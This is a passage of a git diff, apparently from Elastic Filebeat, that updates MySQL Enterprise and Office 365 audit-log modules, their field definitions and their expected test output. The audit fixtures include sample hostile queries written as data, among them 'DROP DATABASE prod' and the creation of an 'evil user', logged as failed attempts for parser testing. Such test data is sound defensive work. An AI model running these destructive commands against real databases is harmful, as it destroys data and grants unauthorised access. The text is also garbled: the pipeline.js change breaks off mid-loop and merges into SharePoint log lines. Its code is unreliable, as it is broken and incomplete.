"mysqlenterprise.audit.class": "table_access", "mysqlenterprise.audit.connection_id": 16, "mysqlenterprise.audit.id": 0, @@ -975,6 +1081,9 @@ "mysqlenterprise.audit.table_access_data.sql_command": "insert", "mysqlenterprise.audit.table_access_data.table": "audit_test_table", "process.name": "mysqld", + "related.hosts": [ + "hades.home" + ], "related.ip": [ "192.168.2.5" ], @@ -998,6 +1107,7 @@ "event.dataset": "mysqlenterprise.audit", "event.kind": "event", "event.module": "mysqlenterprise", + "event.original": "{ \"timestamp\": \"2020-10-19 19:31:57\", \"id\": 1, \"class\": \"general\", \"event\": \"status\", \"connection_id\": 16, \"account\": { \"user\": \"audit_test_user2\", \"host\": \"hades.home\" }, \"login\": { \"user\": \"audit_test_user2\", \"os\": \"\", \"ip\": \"192.168.2.5\", \"proxy\": \"\" }, \"general_data\": { \"command\": \"Query\", \"sql_command\": \"insert\", \"query\": \"INSERT INTO audit_test_table values ('John', 'Smith')\", \"status\": 0 } },", "event.outcome": "success", "event.timezone": "-02:00", "event.type": [ @@ -1006,7 +1116,7 @@ ], "fileset.name": "audit", "input.type": "log", - "log.offset": 9702, + "log.offset": 9716, "mysqlenterprise.audit.class": "general", "mysqlenterprise.audit.connection_id": 16, "mysqlenterprise.audit.general_data.command": "Query", @@ -1016,6 +1126,9 @@ "mysqlenterprise.audit.id": 1, "mysqlenterprise.audit.login.user": "audit_test_user2", "process.name": "mysqld", + "related.hosts": [ + "hades.home" + ], "related.ip": [ "192.168.2.5" ], @@ -1039,6 +1152,7 @@ "event.dataset": "mysqlenterprise.audit", "event.kind": "event", "event.module": "mysqlenterprise", + "event.original": "{ \"timestamp\": \"2020-10-19 19:32:05\", \"id\": 0, \"class\": \"table_access\", \"event\": \"read\", \"connection_id\": 16, \"account\": { \"user\": \"audit_test_user2\", \"host\": \"hades.home\" }, \"login\": { \"user\": \"audit_test_user2\", \"os\": \"\", \"ip\": \"192.168.2.5\", \"proxy\": \"\" }, \"table_access_data\": { \"db\": \"audit_test\", \"table\": \"audit_test_table\", \"query\": \"select * from audit_test_table\", \"sql_command\": \"select\" } },", "event.outcome": "unknown", "event.timezone": "-02:00", "event.type": [ @@ -1047,7 +1161,7 @@ ], "fileset.name": "audit", "input.type": "log", - "log.offset": 10105, + "log.offset": 10119, "mysqlenterprise.audit.class": "table_access", "mysqlenterprise.audit.connection_id": 16, "mysqlenterprise.audit.id": 0, @@ -1057,6 +1171,9 @@ "mysqlenterprise.audit.table_access_data.sql_command": "select", "mysqlenterprise.audit.table_access_data.table": "audit_test_table", "process.name": "mysqld", + "related.hosts": [ + "hades.home" + ], "related.ip": [ "192.168.2.5" ], @@ -1080,6 +1197,7 @@ "event.dataset": "mysqlenterprise.audit", "event.kind": "event", "event.module": "mysqlenterprise", + "event.original": "{ \"timestamp\": \"2020-10-19 19:32:05\", \"id\": 1, \"class\": \"general\", \"event\": \"status\", \"connection_id\": 16, \"account\": { \"user\": \"audit_test_user2\", \"host\": \"hades.home\" }, \"login\": { \"user\": \"audit_test_user2\", \"os\": \"\", \"ip\": \"192.168.2.5\", \"proxy\": \"\" }, \"general_data\": { \"command\": \"Query\", \"sql_command\": \"select\", \"query\": \"select * from audit_test_table\", \"status\": 0 } },", "event.outcome": "success", "event.timezone": "-02:00", "event.type": [ @@ -1088,7 +1206,7 @@ ], "fileset.name": "audit", "input.type": "log", - "log.offset": 10509, + "log.offset": 10523, "mysqlenterprise.audit.class": "general", "mysqlenterprise.audit.connection_id": 16, "mysqlenterprise.audit.general_data.command": "Query", @@ -1098,6 +1216,9 @@ "mysqlenterprise.audit.id": 1, "mysqlenterprise.audit.login.user": "audit_test_user2", "process.name": "mysqld", + "related.hosts": [ + "hades.home" + ], "related.ip": [ "192.168.2.5" ], @@ -1121,6 +1242,7 @@ "event.dataset": "mysqlenterprise.audit", "event.kind": "event", "event.module": "mysqlenterprise", + "event.original": "{ \"timestamp\": \"2020-10-19 19:32:10\", \"id\": 0, \"class\": \"connection\", \"event\": \"disconnect\", \"connection_id\": 16, \"account\": { \"user\": \"audit_test_user2\", \"host\": \"hades.home\" }, \"login\": { \"user\": \"audit_test_user2\", \"os\": \"\", \"ip\": \"192.168.2.5\", \"proxy\": \"\" }, \"connection_data\": { \"connection_type\": \"ssl\" } },", "event.outcome": "unknown", "event.timezone": "-02:00", "event.type": [ @@ -1130,13 +1252,16 @@ ], "fileset.name": "audit", "input.type": "log", - "log.offset": 10889, + "log.offset": 10903, "mysqlenterprise.audit.class": "connection", "mysqlenterprise.audit.connection_data.connection_type": "ssl", "mysqlenterprise.audit.connection_id": 16, "mysqlenterprise.audit.id": 0, "mysqlenterprise.audit.login.user": "audit_test_user2", "process.name": "mysqld", + "related.hosts": [ + "hades.home" + ], "related.ip": [ "192.168.2.5" ], @@ -1159,6 +1284,7 @@ "event.dataset": "mysqlenterprise.audit", "event.kind": "event", "event.module": "mysqlenterprise", + "event.original": "{ \"timestamp\": \"2020-10-19 19:32:12\", \"id\": 0, \"class\": \"connection\", \"event\": \"disconnect\", \"connection_id\": 15, \"account\": { \"user\": \"root\", \"host\": \"localhost\" }, \"login\": { \"user\": \"root\", \"os\": \"\", \"ip\": \"\", \"proxy\": \"\" }, \"connection_data\": { \"connection_type\": \"socket\" } },", "event.outcome": "unknown", "event.timezone": "-02:00", "event.type": [ @@ -1168,13 +1294,16 @@ ], "fileset.name": "audit", "input.type": "log", - "log.offset": 11204, + "log.offset": 11218, "mysqlenterprise.audit.class": "connection", "mysqlenterprise.audit.connection_data.connection_type": "socket", "mysqlenterprise.audit.connection_id": 15, "mysqlenterprise.audit.id": 0, "mysqlenterprise.audit.login.user": "root", "process.name": "mysqld", + "related.hosts": [ + "localhost" + ], "related.user": [ "root" ], @@ -1193,11 +1322,12 @@ "event.dataset": "mysqlenterprise.audit", "event.kind": "event", "event.module": "mysqlenterprise", + "event.original": "{ \"timestamp\": \"2020-10-19 19:32:16\", \"id\": 0, \"class\": \"audit\", \"event\": \"shutdown\", \"connection_id\": 0, \"shutdown_data\": { \"server_id\": 1 } }", "event.outcome": "unknown", "event.timezone": "-02:00", "fileset.name": "audit", "input.type": "log", - "log.offset": 11486, + "log.offset": 11500, "mysqlenterprise.audit.class": "audit", "mysqlenterprise.audit.connection_id": 0, "mysqlenterprise.audit.id": 0, @@ -1207,5 +1337,146 @@ "tags": [ "mysqlenterprise-audit" ] + }, + { + "@timestamp": "2021-02-10T19:05:42.000Z", + "client.domain": "elastic", + "client.ip": "192.168.7.76", + "event.action": "mysql-status", + "event.category": [ + "database", + "iam" + ], + "event.dataset": "mysqlenterprise.audit", + "event.kind": "event", + "event.module": "mysqlenterprise", + "event.original": "{ \"timestamp\": \"2021-02-10 19:05:42\", \"id\": 2, \"class\": \"audit\", \"event\": \"status\", \"connection_id\": 42, \"account\": { \"user\": \"adrian\", \"host\": \"elastic\" }, \"login\": { \"user\": \"adrian\", \"os\": \"\", \"ip\": \"192.168.7.76\", \"proxy\": \"\" }, \"general_data\": { \"command\": \"Query\", \"sql_command\": \"create_user\", \"query\": \"crEAtE uSeR 'evil user'@elastic IDENTIFIED BY \", \"status\": 1396 } },", + "event.outcome": "failure", + "event.timezone": "-02:00", + "event.type": [ + "user", + "creation" + ], + "fileset.name": "audit", + "input.type": "log", + "log.offset": 11644, + "mysqlenterprise.audit.class": "audit", + "mysqlenterprise.audit.connection_id": 42, + "mysqlenterprise.audit.general_data.command": "Query", + "mysqlenterprise.audit.general_data.query": "crEAtE uSeR 'evil user'@elastic IDENTIFIED BY ", + "mysqlenterprise.audit.general_data.sql_command": "create_user", + "mysqlenterprise.audit.general_data.status": 1396, + "mysqlenterprise.audit.id": 2, + "mysqlenterprise.audit.login.user": "adrian", + "process.name": "mysqld", + "related.hosts": [ + "elastic" + ], + "related.ip": [ + "192.168.7.76" + ], + "related.user": [ + "adrian", + "evil user" + ], + "server.user.name": "adrian", + "service.type": "mysqlenterprise", + "tags": [ + "mysqlenterprise-audit" + ], + "user.name": "adrian", + "user.target.domain": "elastic", + "user.target.name": "evil user" + }, + { + "@timestamp": "2021-02-10T19:05:42.000Z", + "client.domain": "elastic", + "client.ip": "192.168.7.76", + "event.action": "mysql-status", + "event.category": [ + "database" + ], + "event.dataset": "mysqlenterprise.audit", + "event.kind": "event", + "event.module": "mysqlenterprise", + "event.original": "{ \"timestamp\": \"2021-02-10 19:05:42\", \"id\": 2, \"class\": \"audit\", \"event\": \"status\", \"connection_id\": 42, \"account\": { \"user\": \"adrian\", \"host\": \"elastic\" }, \"login\": { \"user\": \"evil user\", \"os\": \"\", \"ip\": \"192.168.7.76\", \"proxy\": \"\" }, \"general_data\": { \"command\": \"Query\", \"sql_command\": \"drop_db\", \"query\": \"DROP DATABASE prod\", \"status\": 1396 } },", + "event.outcome": "failure", + "event.timezone": "-02:00", + "fileset.name": "audit", + "input.type": "log", + "log.offset": 12034, + "mysqlenterprise.audit.class": "audit", + "mysqlenterprise.audit.connection_id": 42, + "mysqlenterprise.audit.general_data.command": "Query", + "mysqlenterprise.audit.general_data.query": "DROP DATABASE prod", + "mysqlenterprise.audit.general_data.sql_command": "drop_db", + "mysqlenterprise.audit.general_data.status": 1396, + "mysqlenterprise.audit.id": 2, + "mysqlenterprise.audit.login.user": "evil user", + "process.name": "mysqld", + "related.hosts": [ + "elastic" + ], + "related.ip": [ + "192.168.7.76" + ], + "related.user": [ + "adrian" + ], + "server.user.name": "adrian", + "service.type": "mysqlenterprise", + "tags": [ + "mysqlenterprise-audit" + ] + }, + { + "@timestamp": "2021-02-10T19:05:42.000Z", + "client.domain": "elastic", + "client.ip": "192.168.7.76", + "event.action": "mysql-status", + "event.category": [ + "database", + "iam" + ], + "event.dataset": "mysqlenterprise.audit", + "event.kind": "event", + "event.module": "mysqlenterprise", + "event.original": "{ \"timestamp\": \"2021-02-10 19:05:42\", \"id\": 2, \"class\": \"audit\", \"event\": \"status\", \"connection_id\": 42, \"account\": { \"user\": \"adrian\", \"host\": \"elastic\" }, \"login\": { \"user\": \"evil user\", \"os\": \"\", \"ip\": \"192.168.7.76\", \"proxy\": \"\" }, \"general_data\": { \"command\": \"Query\", \"sql_command\": \"drop_user\", \"query\": \"DrOp usEr IF EXISTS 'evil user'@%\", \"status\": 1396 } },", + "event.outcome": "failure", + "event.timezone": "-02:00", + "event.type": [ + "user", + "deletion" + ], + "fileset.name": "audit", + "input.type": "log", + "log.offset": 12385, + "mysqlenterprise.audit.class": "audit", + "mysqlenterprise.audit.connection_id": 42, + "mysqlenterprise.audit.general_data.command": "Query", + "mysqlenterprise.audit.general_data.query": "DrOp usEr IF EXISTS 'evil user'@%", + "mysqlenterprise.audit.general_data.sql_command": "drop_user", + "mysqlenterprise.audit.general_data.status": 1396, + "mysqlenterprise.audit.id": 2, + "mysqlenterprise.audit.login.user": "evil user", + "process.name": "mysqld", + "related.hosts": [ + "elastic" + ], + "related.ip": [ + "192.168.7.76" + ], + "related.user": [ + "adrian", + "evil user" + ], + "server.user.name": "adrian", + "service.type": "mysqlenterprise", + "tags": [ + "mysqlenterprise-audit" + ], + "user.name": "adrian", + "user.target.domain": "%", + "user.target.name": "evil user" } ] \ No newline at end of file diff --git a/x-pack/filebeat/module/netflow/log/config/netflow.yml b/x-pack/filebeat/module/netflow/log/config/netflow.yml index 68b7b43feb5f..65baa78eaacf 100644 --- a/x-pack/filebeat/module/netflow/log/config/netflow.yml +++ b/x-pack/filebeat/module/netflow/log/config/netflow.yml @@ -38,4 +38,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/netscout/sightline/config/input.yml b/x-pack/filebeat/module/netscout/sightline/config/input.yml index cc3b20640245..8174816245b9 100644 --- a/x-pack/filebeat/module/netscout/sightline/config/input.yml +++ b/x-pack/filebeat/module/netscout/sightline/config/input.yml @@ -84,4 +84,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/o365/audit/_meta/fields.yml b/x-pack/filebeat/module/o365/audit/_meta/fields.yml index 7d3311fb20cd..e107c3a23767 100644 --- a/x-pack/filebeat/module/o365/audit/_meta/fields.yml +++ b/x-pack/filebeat/module/o365/audit/_meta/fields.yml @@ -4,6 +4,9 @@ description: > Fields from Office 365 Management API audit logs. fields: + - name: AADGroupId + type: keyword + - name: Actor type: array fields: @@ -71,6 +74,9 @@ type: text norms: false + - name: CommunicationType + type: keyword + - name: CorrelationId type: keyword @@ -86,9 +92,15 @@ - name: DataType type: keyword + - name: DoNotDistributeEvent + type: boolean + - name: EntityType type: keyword + - name: ErrorNumber + type: keyword + - name: EventData type: keyword @@ -104,6 +116,9 @@ - name: ExternalAccess type: keyword + - name: FromApp + type: boolean + - name: GroupName type: keyword @@ -125,21 +140,42 @@ - name: IntraSystemId type: keyword + - name: IsDocLib + type: boolean + - name: Item.* type: object - name: Item.*.* type: object + - name: ItemCount + type: long + - name: ItemName type: keyword - name: ItemType type: keyword + - name: ListBaseTemplateType + type: keyword + + - name: ListBaseType + type: keyword + + - name: ListColor + type: keyword + + - name: ListIcon + type: keyword + - name: ListId type: keyword + - name: ListTitle + type: keyword + - name: ListItemUniqueId type: keyword @@ -266,6 +302,9 @@ - name: TeamGuid type: keyword + - name: TemplateTypeId + type: keyword + - name: UniqueSharingId type: keyword diff --git a/x-pack/filebeat/module/o365/audit/config/input.yml b/x-pack/filebeat/module/o365/audit/config/input.yml index 72e13c42c687..11c7be4fc703 100644 --- a/x-pack/filebeat/module/o365/audit/config/input.yml +++ b/x-pack/filebeat/module/o365/audit/config/input.yml @@ -38,6 +38,11 @@ publisher_pipeline.disable_host: {{ inList .tags "forwarded" }} processors: {{ if eq .input "file" }} + - rename: + fields: + - from: json.error + to: error + ignore_missing: true - rename: fields: - from: json @@ -62,4 +67,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/o365/audit/config/pipeline.js b/x-pack/filebeat/module/o365/audit/config/pipeline.js index 5d314822af63..dd1fe588e9e5 100644 --- a/x-pack/filebeat/module/o365/audit/config/pipeline.js +++ b/x-pack/filebeat/module/o365/audit/config/pipeline.js @@ -191,8 +191,113 @@ function exchangeAdminSchema(debug) { return builder.Build(); } -function azureADLogonSchema(debug) { +function typeMapEnrich(conversions) { + return function (evt) { + var action = evt.Get("event.action"); + if (action != null && conversions.hasOwnProperty(action)) { + var conv = conversions[action]; + if (conv.action !== undefined) evt.Put("event.action", conv.action); + if (conv.category !== undefined) evt.Put("event.category", conv.category); + if (conv.type !== undefined) evt.Put("event.type", conv.type); + var n = conv.copy !== undefined? conv.copy.length : 0; + for (var i=0; iSite Members<\/Group>","TargetUserOrGroupType":"SecurityGroup","SiteUrl":"https:\/\/testsiem4.sharepoint.com\/sites\/users","TargetUserOrGroupName":"Everyone except external users"} +{"CreationTime":"2021-02-05T09:07:56","Id":"a9b8277d-d3b9-4d99-0491-08d8c9b5874b","Operation":"AddedToGroup","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":14,"UserKey":"i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint","UserType":0,"Version":1,"Workload":"SharePoint","ClientIP":"","ObjectId":"https:\/\/testsiem4.sharepoint.com\/sites\/users","UserId":"app@sharepoint","CorrelationId":"4eb429d5-cf62-4a12-a3f6-526628c81d78","EventSource":"SharePoint","ItemType":"Web","Site":"457ebd3e-0d71-454f-a4d4-2f552991d13c","UserAgent":"","WebId":"3b387d63-522a-4745-bcc8-4107d92b8840","EventData":"Site Owners<\/Group>","TargetUserOrGroupType":"Member","SiteUrl":"https:\/\/testsiem4.sharepoint.com\/sites\/users","TargetUserOrGroupName":"SHAREPOINT\\system"} +{"CreationTime":"2021-02-05T09:07:56","Id":"dfef0880-e895-47e1-2e39-08d8c9b58733","Operation":"AddedToGroup","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":14,"UserKey":"i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint","UserType":0,"Version":1,"Workload":"SharePoint","ClientIP":"","ObjectId":"https:\/\/testsiem4.sharepoint.com\/sites\/users","UserId":"app@sharepoint","CorrelationId":"4eb429d5-cf62-4a12-a3f6-526628c81d78","EventSource":"SharePoint","ItemType":"Web","Site":"457ebd3e-0d71-454f-a4d4-2f552991d13c","UserAgent":"","WebId":"3b387d63-522a-4745-bcc8-4107d92b8840","EventData":"Site Owners<\/Group>","TargetUserOrGroupType":"SecurityGroup","SiteUrl":"https:\/\/testsiem4.sharepoint.com\/sites\/users","TargetUserOrGroupName":"users Owners"} +{"CreationTime":"2021-02-05T09:07:56","Id":"d9b6f410-30c7-42a0-0820-08d8c9b5872c","Operation":"AddedToGroup","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":14,"UserKey":"i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint","UserType":0,"Version":1,"Workload":"SharePoint","ClientIP":"","ObjectId":"https:\/\/testsiem4.sharepoint.com\/sites\/users","UserId":"app@sharepoint","CorrelationId":"4eb429d5-cf62-4a12-a3f6-526628c81d78","EventSource":"SharePoint","ItemType":"Web","Site":"457ebd3e-0d71-454f-a4d4-2f552991d13c","UserAgent":"","WebId":"3b387d63-522a-4745-bcc8-4107d92b8840","EventData":"Site Members<\/Group>","TargetUserOrGroupType":"SecurityGroup","SiteUrl":"https:\/\/testsiem4.sharepoint.com\/sites\/users","TargetUserOrGroupName":"users Members"} +{"CreationTime":"2021-02-05T09:07:56","Id":"5c82c14e-525e-44f4-7cd7-08d8c9b58722","Operation":"AddedToGroup","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":14,"UserKey":"i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint","UserType":0,"Version":1,"Workload":"SharePoint","ClientIP":"","ObjectId":"https:\/\/testsiem4.sharepoint.com\/sites\/users","UserId":"app@sharepoint","CorrelationId":"4eb429d5-cf62-4a12-a3f6-526628c81d78","EventSource":"SharePoint","ItemType":"Web","Site":"457ebd3e-0d71-454f-a4d4-2f552991d13c","UserAgent":"","WebId":"3b387d63-522a-4745-bcc8-4107d92b8840","EventData":"Site Owners<\/Group>","TargetUserOrGroupType":"Member","SiteUrl":"https:\/\/testsiem4.sharepoint.com\/sites\/users","TargetUserOrGroupName":"SHAREPOINT\\system"} +{"CreationTime":"2021-02-05T09:07:56","Id":"f576a30e-1734-4f42-f3b3-08d8c9b58718","Operation":"SiteCollectionCreated","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":4,"UserKey":"i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint","UserType":0,"Version":1,"Workload":"SharePoint","ClientIP":"20.190.143.50","ObjectId":"https:\/\/testsiem4.sharepoint.com\/sites\/users","UserId":"app@sharepoint","ApplicationDisplayName":"Microsoft Graph","ApplicationId":"00000006-0000-0ff1-ce00-000000000000","CorrelationId":"4eb429d5-cf62-4a12-a3f6-526628c81d78","EventSource":"SharePoint","ItemType":"Site","Site":"457ebd3e-0d71-454f-a4d4-2f552991d13c","UserAgent":"","EventData":"O365AdminCenter<\/SiteCreationSource>True<\/TenantSettings.ShowCreateSiteCommand>False<\/TenantSettings.UseCustomSiteCreationForm>"} +{"CreationTime":"2021-02-05T09:07:56","Id":"f84f38b0-1963-4a1d-454e-08d8c9b586e9","Operation":"AddedToGroup","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":14,"UserKey":"i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint","UserType":0,"Version":1,"Workload":"SharePoint","ClientIP":"","ObjectId":"https:\/\/testsiem4.sharepoint.com\/sites\/users","UserId":"app@sharepoint","CorrelationId":"4eb429d5-cf62-4a12-a3f6-526628c81d78","EventSource":"SharePoint","ItemType":"Web","Site":"457ebd3e-0d71-454f-a4d4-2f552991d13c","UserAgent":"","WebId":"3b387d63-522a-4745-bcc8-4107d92b8840","EventData":"Site Owners<\/Group>","TargetUserOrGroupType":"SecurityGroup","SiteUrl":"https:\/\/testsiem4.sharepoint.com\/sites\/users","TargetUserOrGroupName":"users Owners"} +{"CreationTime":"2021-02-05T09:07:55","Id":"e85ec350-af23-47a7-5b33-08d8c9b586be","Operation":"AddedToGroup","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":14,"UserKey":"i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint","UserType":0,"Version":1,"Workload":"SharePoint","ClientIP":"","ObjectId":"https:\/\/testsiem4.sharepoint.com\/sites\/users","UserId":"app@sharepoint","CorrelationId":"4eb429d5-cf62-4a12-a3f6-526628c81d78","EventSource":"SharePoint","ItemType":"Web","Site":"457ebd3e-0d71-454f-a4d4-2f552991d13c","UserAgent":"","WebId":"3b387d63-522a-4745-bcc8-4107d92b8840","EventData":"Site Owners<\/Group>","TargetUserOrGroupType":"Member","SiteUrl":"https:\/\/testsiem4.sharepoint.com\/sites\/users","TargetUserOrGroupName":"SHAREPOINT\\system"} +{"CreationTime":"2021-02-05T09:08:14","Id":"32474de1-fca7-4d81-4f97-08d8c9b591a4","Operation":"ListUpdated","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":36,"UserKey":"i:0h.f|membership|1003200112eb07e6@live.com","UserType":0,"Version":1,"Workload":"SharePoint","ClientIP":"52.114.88.180","ObjectId":"https:\/\/testsiem4.sharepoint.com\/sites\/users\/96cdfc22-2b86-49ea-b4e9-f11888b1665d","UserId":"root@testsiem4.onmicrosoft.com","ApplicationDisplayName":"Microsoft Teams Services","ApplicationId":"cc15fd57-2c6c-4117-a88c-83b1d56b4bbe","CorrelationId":"fc39a89f-4077-2000-7abb-cbd546e4157d","DoNotDistributeEvent":true,"EventSource":"SharePoint","ItemType":"List","ListId":"96cdfc22-2b86-49ea-b4e9-f11888b1665d","Site":"457ebd3e-0d71-454f-a4d4-2f552991d13c","UserAgent":"SkypeSpaces\/1.0a$*+","WebId":"3b387d63-522a-4745-bcc8-4107d92b8840","FromApp":false,"IsDocLib":true,"ItemCount":0,"ListBaseTemplateType":"101","ListBaseType":"DocumentLibrary","ListColor":"","ListIcon":"","TemplateTypeId":"","ListTitle":"96cdfc22-2b86-49ea-b4e9-f11888b1665d"} +{"CreationTime":"2021-02-05T09:08:14","Id":"20b7fc96-6e31-437a-50fa-08d8c9b59185","Operation":"ListCreated","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":36,"UserKey":"i:0h.f|membership|1003200112eb07e6@live.com","UserType":0,"Version":1,"Workload":"SharePoint","ClientIP":"52.114.88.180","ObjectId":"https:\/\/testsiem4.sharepoint.com\/sites\/users\/SiteAssets","UserId":"root@testsiem4.onmicrosoft.com","ApplicationDisplayName":"Microsoft Teams Services","ApplicationId":"cc15fd57-2c6c-4117-a88c-83b1d56b4bbe","CorrelationId":"fc39a89f-4077-2000-7abb-cbd546e4157d","EventSource":"SharePoint","ItemType":"List","ListId":"96cdfc22-2b86-49ea-b4e9-f11888b1665d","Site":"457ebd3e-0d71-454f-a4d4-2f552991d13c","UserAgent":"SkypeSpaces\/1.0a$*+","WebId":"3b387d63-522a-4745-bcc8-4107d92b8840","ListBaseTemplateType":"DocumentLibrary","ListBaseType":"DocumentLibrary","ListTitle":"96CDFC22-2B86-49EA-B4E9-F11888B1665D"} +{"CreationTime":"2021-02-05T09:08:17","Id":"3813eef0-90e1-4758-54d8-08d8c9b5938e","Operation":"ListColumnUpdated","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":56,"UserKey":"i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint","UserType":0,"Version":1,"Workload":"SharePoint","ClientIP":"51.141.50.227","ObjectId":"https:\/\/testsiem4.sharepoint.com\/sites\/users\/96cdfc22-2b86-49ea-b4e9-f11888b1665d\/03e45e84-1992-4d42-9116-26f756012634","UserId":"app@sharepoint","ApplicationDisplayName":"OneNote","ApplicationId":"2d4d3d8e-2be3-4bef-9f87-7875a61c29de","CorrelationId":"fd39a89f-9050-2000-7abb-ce79fabfa6c0","DoNotDistributeEvent":true,"EventSource":"SharePoint","ItemType":"Field","ListId":"96cdfc22-2b86-49ea-b4e9-f11888b1665d","Site":"457ebd3e-0d71-454f-a4d4-2f552991d13c","UserAgent":"onenoteapi","WebId":"3b387d63-522a-4745-bcc8-4107d92b8840","FromApp":false,"IsDocLib":true,"ItemCount":1,"ListBaseTemplateType":"101","ListBaseType":"DocumentLibrary","ListColor":"","ListIcon":"","TemplateTypeId":"","ListTitle":"96cdfc22-2b86-49ea-b4e9-f11888b1665d"} +{"CreationTime":"2021-02-05T09:08:17","Id":"597a6c1b-fa1f-46aa-f2ce-08d8c9b5938b","Operation":"ListColumnUpdated","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":56,"UserKey":"i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint","UserType":0,"Version":1,"Workload":"SharePoint","ClientIP":"51.141.50.227","ObjectId":"https:\/\/testsiem4.sharepoint.com\/sites\/users\/96cdfc22-2b86-49ea-b4e9-f11888b1665d\/0c5e0085-eb30-494b-9cdd-ece1d3c649a2","UserId":"app@sharepoint","ApplicationDisplayName":"OneNote","ApplicationId":"2d4d3d8e-2be3-4bef-9f87-7875a61c29de","CorrelationId":"fd39a89f-9050-2000-7abb-ce79fabfa6c0","DoNotDistributeEvent":true,"EventSource":"SharePoint","ItemType":"Field","ListId":"96cdfc22-2b86-49ea-b4e9-f11888b1665d","Site":"457ebd3e-0d71-454f-a4d4-2f552991d13c","UserAgent":"onenoteapi","WebId":"3b387d63-522a-4745-bcc8-4107d92b8840","FromApp":false,"IsDocLib":true,"ItemCount":1,"ListBaseTemplateType":"101","ListBaseType":"DocumentLibrary","ListColor":"","ListIcon":"","TemplateTypeId":"","ListTitle":"96cdfc22-2b86-49ea-b4e9-f11888b1665d"} +{"CreationTime":"2021-02-05T09:08:17","Id":"f4579e76-fb4b-4434-904e-08d8c9b59389","Operation":"ListColumnUpdated","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":56,"UserKey":"i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint","UserType":0,"Version":1,"Workload":"SharePoint","ClientIP":"51.141.50.227","ObjectId":"https:\/\/testsiem4.sharepoint.com\/sites\/users\/96cdfc22-2b86-49ea-b4e9-f11888b1665d\/39360f11-34cf-4356-9945-25c44e68dade","UserId":"app@sharepoint","ApplicationDisplayName":"OneNote","ApplicationId":"2d4d3d8e-2be3-4bef-9f87-7875a61c29de","CorrelationId":"fd39a89f-9050-2000-7abb-ce79fabfa6c0","DoNotDistributeEvent":true,"EventSource":"SharePoint","ItemType":"Field","ListId":"96cdfc22-2b86-49ea-b4e9-f11888b1665d","Site":"457ebd3e-0d71-454f-a4d4-2f552991d13c","UserAgent":"onenoteapi","WebId":"3b387d63-522a-4745-bcc8-4107d92b8840","FromApp":false,"IsDocLib":true,"ItemCount":1,"ListBaseTemplateType":"101","ListBaseType":"DocumentLibrary","ListColor":"","ListIcon":"","TemplateTypeId":"","ListTitle":"96cdfc22-2b86-49ea-b4e9-f11888b1665d"} +{"CreationTime":"2021-02-05T09:08:17","Id":"b401dd51-f4a2-477f-cc42-08d8c9b59384","Operation":"ListColumnUpdated","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":56,"UserKey":"i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint","UserType":0,"Version":1,"Workload":"SharePoint","ClientIP":"51.141.50.227","ObjectId":"https:\/\/testsiem4.sharepoint.com\/sites\/users\/66afcf95-7cd2-4b68-a3e8-3383d908b8f2\/03e45e84-1992-4d42-9116-26f756012634","UserId":"app@sharepoint","ApplicationDisplayName":"OneNote","ApplicationId":"2d4d3d8e-2be3-4bef-9f87-7875a61c29de","CorrelationId":"fd39a89f-9050-2000-7abb-ce79fabfa6c0","DoNotDistributeEvent":true,"EventSource":"SharePoint","ItemType":"Field","ListId":"66afcf95-7cd2-4b68-a3e8-3383d908b8f2","Site":"457ebd3e-0d71-454f-a4d4-2f552991d13c","UserAgent":"onenoteapi","WebId":"3b387d63-522a-4745-bcc8-4107d92b8840","FromApp":false,"IsDocLib":true,"ItemCount":1,"ListBaseTemplateType":"101","ListBaseType":"DocumentLibrary","ListColor":"","ListIcon":"","TemplateTypeId":"","ListTitle":"66afcf95-7cd2-4b68-a3e8-3383d908b8f2"} +{"CreationTime":"2021-02-05T09:08:17","Id":"073f437c-2e04-441a-05ad-08d8c9b59380","Operation":"ListColumnUpdated","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":56,"UserKey":"i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint","UserType":0,"Version":1,"Workload":"SharePoint","ClientIP":"51.141.50.227","ObjectId":"https:\/\/testsiem4.sharepoint.com\/sites\/users\/66afcf95-7cd2-4b68-a3e8-3383d908b8f2\/0c5e0085-eb30-494b-9cdd-ece1d3c649a2","UserId":"app@sharepoint","ApplicationDisplayName":"OneNote","ApplicationId":"2d4d3d8e-2be3-4bef-9f87-7875a61c29de","CorrelationId":"fd39a89f-9050-2000-7abb-ce79fabfa6c0","DoNotDistributeEvent":true,"EventSource":"SharePoint","ItemType":"Field","ListId":"66afcf95-7cd2-4b68-a3e8-3383d908b8f2","Site":"457ebd3e-0d71-454f-a4d4-2f552991d13c","UserAgent":"onenoteapi","WebId":"3b387d63-522a-4745-bcc8-4107d92b8840","FromApp":false,"IsDocLib":true,"ItemCount":1,"L